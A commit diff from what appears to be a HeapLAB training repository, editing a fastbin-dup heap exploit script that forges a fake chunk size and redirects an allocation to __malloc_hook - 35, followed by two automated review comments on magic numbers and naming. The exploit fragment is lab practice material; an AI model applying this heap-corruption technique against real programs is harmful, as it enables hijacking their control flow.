author | Brett Weiland <brett_weiland@bpcspace.com> | 2021-01-04 18:48:38 -0600 |
---|---|---|
committer | Brett Weiland <brett_weiland@bpcspace.com> | 2021-01-04 18:48:38 -0600 |
commit | 4c06c05f4eaf614ff0dfd4fe0fa62557331d7fb7 (patch) | |
tree | a0b03ab87597378ba0e71dd54ef0cd4a550a03e0 /HeapLAB/challenge-fastbin_dup/bruh.py | |
parent | ba02c1bd6981675aaf5a0b6cddb7457e53d5eed1 (diff) |
modified: HeapLAB/challenge-fastbin_dup/.gdb_history
modified: HeapLAB/challenge-fastbin_dup/bruh.py
Diffstat (limited to 'HeapLAB/challenge-fastbin_dup/bruh.py')
-rwxr-xr-x | HeapLAB/challenge-fastbin_dup/bruh.py | 7 |
1 files changed, 4 insertions, 3 deletions
diff --git a/HeapLAB/challenge-fastbin_dup/bruh.py b/HeapLAB/challenge-fastbin_dup/bruh.py
index 191cbea..56b0c71 100755
--- a/HeapLAB/challenge-fastbin_dup/bruh.py
+++ b/HeapLAB/challenge-fastbin_dup/bruh.py
@@ -55,7 +55,7 @@ free(chunk1)
 #malloc(24, p64(libc.sym.main_arena + 96))
 #this sets up a fake size field in the fastbins
-malloc(24, p64(0x81))
+malloc(24, p64(0x80))
 malloc(24, 'asdf')
 malloc(24, 'asdf')
@@ -74,9 +74,10 @@ malloc(119, 'sdfg')
 #8 * 9
-malloc(119, p64(0)*9 + p64(libc.sym.__free_hook - 16))
+payload_loc = libc.sym.__malloc_hook - 35
+malloc(119, p64(0)*9 + p64(payload_loc))
-print(hex(fake_chunk_loc))
+print("top chunk addr: {}".format(hex(payload_loc)))
 # ============================================================================= |
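Review bot: The size literal in `malloc(24, p64(0x80))` changed from 0x81, but the comment above it, `#this sets up a fake size field in the fastbins`, still does not say what the value has to agree with or why the low bit was cleared. A named constant carrying that explanation, e.g. `FAKE_SIZE = 0x80  # <request size this must match; why the flag bit is clear>`, would keep these lab notes readable later. The script continues outside the hunk, so the actual constraint cannot be confirmed from the lines shown.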
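Review bot: The offset in `payload_loc = libc.sym.__malloc_hook - 35` is an unexplained magic number, and it replaces `__free_hook - 16` with no comment on why the target symbol changed. Both the hook and the offset depend on the libc build the lab ships (glibc 2.34 and later no longer call these hooks), so the line should carry a comment such as `# offset derived for the libc bundled with this challenge; re-derive if that libc changes`. The new `print` labels the value "top chunk addr" while the variable is called `payload_loc`; using one name for it would avoid confusion when reading the output. The script's setup (`libc`, `malloc`, `free`) lies outside the hunk.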